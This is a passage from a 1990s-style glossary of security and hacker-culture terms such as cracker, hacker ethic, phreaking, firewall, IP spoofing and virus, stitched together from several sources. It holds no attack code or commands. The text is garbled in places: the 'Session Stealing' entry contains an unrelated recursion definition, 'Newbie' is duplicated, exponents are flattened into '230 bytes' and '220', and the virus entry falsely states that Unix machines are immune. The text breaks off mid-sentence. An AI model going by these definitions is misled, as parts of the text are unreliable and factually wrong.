theft and vandalism perpetrated by cracking rings. While it is expected
that any real hacker will have done some playful cracking and knows many
of the basic techniques, anyone past larval stage is expected to have
outgrown the desire to do so except for immediate, benign, practical
reasons (for example, if it's necessary to get around some security in
order to get some work done --oops I forgot my password).
Thus, there is far less overlap between hackerdom and crackerdom than
the mundane reader misled by sensationalistic journalism might expect.
Crackers tend to gather in small, tight-knit, very secretive groups that
have little overlap with the huge, open poly-culture this lexicon
describes; though crackers often like to describe _themselves_ as
hackers, most true hackers consider them a separate and lower form of
life.
Ethical considerations aside, hackers figure that anyone who can't
imagine a more interesting way to play with their computers than
breaking into someone else's has to be pretty losing. Some other reasons
crackers are looked down on are discussed in the entries on phreaking.
Cryptographic Checksum
A one-way function applied to a file to produce a unique "fingerprint"
of the file for later reference. Checksum systems are a primary means
of detecting filesystem tampering on Unix.
Computer
A device that computes, especially a programmable electronic machine
that performs high-speed mathematical or logical operations or that
assembles, stores, correlates, or otherwise processes information.
Dark-Side-Hacker
A criminal or malicious hacker; a cracker. From George Lucas's Darth
Vader, "seduced by the dark side of the Force". The implication that
hackers form a sort of elite of technological Jedi Knights is intended.
Data Driven Attack
A form of attack in which the attack is encoded in innocuous-seeming
data which is executed by a user or other software to implement an
attack. In the case of firewalls, a data driven attack is a concern
since it may get through the firewall in data form and launch an attack
against a system behind the firewall.
Doubled Sig
A sig block that has been included twice in a Usenet article or, less
commonly, in an electronic mail message. An article or message with a
doubled sig can be caused by improperly configured software. More often,
however, it reveals the author's lack of experience in electronic
communication.
Defence in Depth
The security approach whereby each system on the network is secured to
the greatest possible degree. May be used in conjunction with firewalls.
DNS spoofing
Assuming the DNS name of another system by either corrupting the name
service cache of a victim system, or by compromising a domain name
server for a valid domain.
Dual Homed Gateway
A dual homed gateway is a system that has two or more
network interfaces, each of which is connected to a different network.
In firewall configurations, a dual homed gateway usually acts to block
or filter some or all of the traffic trying to pass between the
networks.
Encrypting Router
see Tunneling Router and Virtual Network Perimeter.
Firewall
A system or combination of systems that enforces a boundary between two
or more networks.
Gigabyte
A unit of computer memory or data storage capacity equal to 1,024
megabytes (230 bytes).
One billion bytes. : a unit of information equal to one billion
(1,000,000,000) bytes or one thousand megabytes
Hacker Ethic
The belief that information-sharing is a powerful positive good, and
that it is an ethical duty of hackers to share their expertise by
writing open-source and facilitating access to information and to
computing resources wherever possible. 2. The belief that
system-cracking for fun and exploration is ethically OK as long as the
cracker commits no theft, vandalism, or breach of confidentiality.
Both of these normative ethical principles are widely, but by no means
universally, accepted among hackers. Most hackers subscribe to the
hacker ethic in sense 1, and many act on it by writing and giving away
open-source software. A few go further and assert that _all_ information
should be free and _any_ proprietary control of it is bad; this is the
philosophy behind the GNU project.
More controversial: some people consider the act of cracking itself to
be unethical, like breaking and entering. But the belief that 'ethical'
cracking excludes destruction at least moderates the behavior of people
who see themselves as 'benign' crackers (see also samurai). On this
view, it may be one of the highest forms of hackerly courtesy to (a)
break into a system, and then (b) explain to the sysop, preferably by
email from a superuser account, exactly how it was done and how the hole
can be plugged -- acting as an unpaid (and unsolicited) tiger team.
The most reliable manifestation of either version of the hacker ethic is
that almost all hackers are actively willing to share technical tricks,
software, and (where possible) computing resources with other hackers.
Huge cooperative networks such as Usenet, FidoNet and Internet (see
Internet address) can function without central control because of this
trait; they both rely on and reinforce a sense of community that may be
hackerdom's most valuable intangible asset.
Host-based Security
The technique of securing an individual system from attack. Host based
security is operating system and version dependent.
Insider Attack
An attack originating from inside a protected network.
Intrusion Detection
Detection of break-ins or break-in attempts either manually or
via software expert systems that operate on logs or other
information available on the network.
IP Spoofing
An attack whereby a system attempts to illicitly impersonate another
system by using its IP network address.
IP Splicing / Hijacking
An attack whereby an active, established, session is intercepted and
co-opted by the attacker. IP Splicing attacks may occur after an
authentication has been made, permitting the attacker to assume the role
of an already authorized user. Primary protections against IP Splicing
rely on encryption at the session or network layer.
Least Privilege
Designing operational aspects of a system to operate with a minimum
amount of system privilege. This reduces the authorization level at
which various actions are performed and decreases the chance that a
process or user with high privileges may be caused to perform
unauthorized activity resulting in a security breach.
Logging
The process of storing information about events that occurred on the
firewall or network.
Log Retention
How long audit logs are retained and maintained.
Log Processing
How audit logs are processed, searched for key events, or summarized.
Megabyte
A unit of computer memory or data storage capacity equal to 1,048,576
(220) bytes. i.e.: (2^20 = 1,048,576 bytes = 1024 kilobytes.) 1024
megabytes are one gigabyte
Network-Level Firewall
A firewall in which traffic is examined at the network protocol packet
level.
Network address / Internet address
The 32-bit host address defined by the Internet Protocol in STD 5, RFC
791. It is usually represented in
dotted decimal notation.
A hosts's Internet address is sometimes related to its Ethernet address.
The Internet address is usually expressed in dot notation, e.g.
128.121.4.5. The address can be split into a network number (or network
address) and a host number unique to each host on the network and
sometimes also a subnet address. The way the address is split depends on
its "class", A, B or C as determined by the high address bits:
Class A - high bit 0, 7-bit network number, 24-bit host number. n1.a.a.a
0 <= n1 <= 127
Class B - high 2 bits 10, 14-bit network number, 16-bit host number.
n1.n2.a.a 128 <= n1 <= 191
Class C - high 3 bits 110, 21-bit network number, 8-bit host number.
n1.n2.n3.a 192 <= n1 <= 223
The Internet address must be translated into an Ethernet address by
either ARP or constant mapping.
The term is sometimes used incorrectly to refer to a host's fully
qualified domain name.
As used by hackers, means an address on `the' network (see the network;
this used to include bang path addresses but now almost always implies
an {Internet address}). Net addresses are often used in email text as a
more concise substitute for personal names; indeed, hackers may come to
know each other quite well by network names without ever learning each
others' `legal' monikers. Indeed, display of a network address (e.g on
business cards) used to function as an important hacker identification
signal, like lodge pins among Masons or tie-dyed T-shirts among Grateful
Dead fans. In the day of pervasive Internet this is less true, but you
can still be fairly sure that anyone with a network address handwritten
on his or her convention badge is a hacker
Newbie
This term surfaced in the newsgroup news:talk.bizarre but is now in wide
use. Criteria for being considered a newbie vary wildly; a person can be
called a newbie in one newsgroup while remaining a respected regular in
another. The label "newbie" is sometimes applied as a serious insult to
a person who has been around Usenet for a long time but who carefully
hides all evidence of having a clue.
from British public-school and military slang variant of 'new boy'] A
Usenet neophyte. This term surfaced in the newsgroup talk.bizarre but is
now in wide use. Criteria for being considered a newbie vary wildly; a
person can be called a newbie in one newsgroup while remaining a
respected regular in another. The label 'newbie' is sometimes applied as
a serious insult to a person who has been around Usenet for a long time
but who carefully hides all evidence of having a clue.
Perimeter-based Security
The technique of securing a network by controlling access to all entry
and exit points of the network.
Phreaking
The art and science of cracking the phone network (so as, for example,
to make free long-distance calls). By extension, security-cracking in
any other context (especially, but not exclusively, on communications
networks) (see cracking). At one time phreaking was a semi-respectable
activity among hackers; there was a gentleman's agreement that phreaking
as an intellectual game and a form of exploration was OK, but serious
theft of services was taboo. There was significant crossover between the
hacker community and the hard-core phone phreaks who ran
semi-underground networks of their own through such media as the
legendary "TAP Newsletter". This ethos began to break down in the
mid-1980s as wider dissemination of the techniques put them in the hands
of less responsible phreaks. Around the same time, changes in the phone
network made old-style technical ingenuity less effective as a way of
hacking it, so phreaking came to depend more on overtly criminal acts
such as stealing phone-card numbers. The crimes and punishments of gangs
like the '414 group' turned that game very ugly. A few old-time hackers
still phreak casually just to keep their hand in, but most these days
have hardly even heard of 'blue boxes' or any of the other paraphernalia
of the great phreaks of yore.
Policy
Organization-level rules governing acceptable use of
computing resources, security practices, and operational procedures.
Polynomial
Of, relating to, or consisting of more than two names or terms.
An algebraic expression consisting of one or more summed terms, each
term consisting of a constant multiplier and one or more variables
raised to integral powers. For example, x2 - 5x + 6 and 2p3q + y are
polynomials. Also called multinomial.
Proxy
A software agent that acts on behalf of a user. Typical proxies accept
a connection from a user, make a decision as to whether or not the user
or client IP address is permitted to use the proxy, perhaps does
additional authentication, and then completes a connection on behalf of
the user to a remote destination.
Pseudo
An electronic-mail or Usenet persona adopted by a human for amusement
value or as a means of avoiding negative repercussions of one's
net.behavior; a 'nom de Usenet', often associated with forged postings
designed to conceal message origins. Perhaps the best-known and funniest
hoax of this type is B1FF. See also tentacle. 2. Notionally, a flamage-generating
AI program simulating a Usenet user. Many flamers have been accused of
actually being such entities, despite the fact that no AI program of the
required sophistication yet exists. However, in 1989 there was a famous
series of forged postings that used a phrase-frequency-based travesty
generator to simulate the styles of several well-known flamers; it was
based on large samples of their back postings (compare Dissociated
Press). A significant number of people were fooled by the forgeries, and
the debate over their authenticity was settled only when the perpetrator
came forward to publicly admit the hoax.
Recursive, Recursion
An expression, such as a polynomial, each term of which is determined by
application of a formula to preceding terms.
A formula that generates the successive terms of a recursion
Samurai
A hacker who hires out for legal cracking jobs, snooping for factions in
corporate political fights, lawyers pursuing privacy-rights and First
Amendment cases, and other parties with legitimate reasons to need an
electronic locksmith. In 1991, mainstream media reported the existence
of a loose-knit culture of samurai that meets electronically on BBS
systems, mostly bright teenagers with personal micros; they have
modelled themselves explicitly on the historical samurai of Japan and on
the "net cowboys" of William Gibson's cyberpunk novels. Those
interviewed claim to adhere to a rigid ethic of loyalty to their
employers and to disdain the vandalism and theft practiced by criminal
crackers as beneath them and contrary to the hacker ethic; some quote
Miyamoto Musashi's "Book of Five Rings", a classic of historical samurai
doctrine, in support of these principles.
Subnet address
The subnet portion of an IP address. In a subnetted network, the host
portion of an IP address is split into a subnet portion and a host
portion using an address mask (the subnet mask). See
subnet.
Screened Host
A host on a network behind a screening router. The degree to which a
screened host may be accessed depends on the screening rules in the
router.
Screened Subnet
A subnet behind a screening router. The degree to which the subnet may
be accessed depends on the screening rules in the router.
Screening Router
A router configured to permit or deny traffic based on a set
of permission rules installed by the administrator.
Session Stealing
See IP Splicing. An expression, such as a polynomial, each term of
which is determined by application of a formula to preceding terms.
A formula that generates the successive terms of a recursion.
Trojan Horse
A software entity that appears to do something normal but which, in
fact, contains a trapdoor or attack program.
Tunneling Router
A router or system capable of routing traffic by encrypting it
and encapsulating it for transmission across an untrusted network,
for eventual de-encapsulation and decryption.
Social Engineering
An attack based on deceiving users or administrators at the
target site. Social engineering attacks are typically carried out
by telephoning users or operators and pretending to be an authorized
user, to attempt to gain illicit access to systems.
usenet
A messaging system that uses a computer network, especially the
Internet, to transfer messages organized in thematic groups.
A distributed bboard (bulletin board) system supported mainly by Unix
machines. Originally implemented in 1979-1980 by Steve Bellovin, Jim
Ellis, Tom Truscott, and Steve Daniel at Duke University, it has swiftly
grown to become international in scope and is now probably the largest
decentralized information utility in existence. As of early 1996, it
hosted over 10,000 newsgroups and an average of over 500 megabytes (the
equivalent of several thousand paper pages) of new technical articles,
news, discussion, chatter, and flamage every day (and that leaves out
the graphics...).
By the year the Internet hit the mainstream (1994) the original UUCP
transport for Usenet was fading out of use (see UUCPNET) - almost all
Usenet connections were over Internet links. A lot of newbies and
journalists began to refer to "Internet newsgroups" as though Usenet was
and always had been just another Internet service. This ignorance
greatly annoys experienced Usenetters
UUCPNET
The store-and-forward network consisting of all the world's connected
Unix machines (and others running some clone of the UUCP (Unix-to-Unix
CoPy) software). Any machine reachable only via a bang path is on
UUCPNET. This term has been rendered obsolescent by the spread of cheap
Internet connections in the 1990s; the few remaining UUCP links are
essentially slow channels to the Internet rather than an autonomous
network.
Virtual Network Perimeter
A network that appears to be a single protected network
behind firewalls, which actually encompasses encrypted virtual links
over untrusted networks.
Virus
A replicating code segment that attaches itself to a programme or data
file. Viruses might or might not contain attack programs or trapdoor
payloads. In the 1990s, viruses became a serious problem, especially
among Wintel and Macintosh users; the lack of security on these machines
enables viruses to spread easily, even infecting the operating system
(Unix machines, by contrast, are immune to such attacks). The production
of special anti-virus software has become an industry, and a number of
exaggerated media reports | |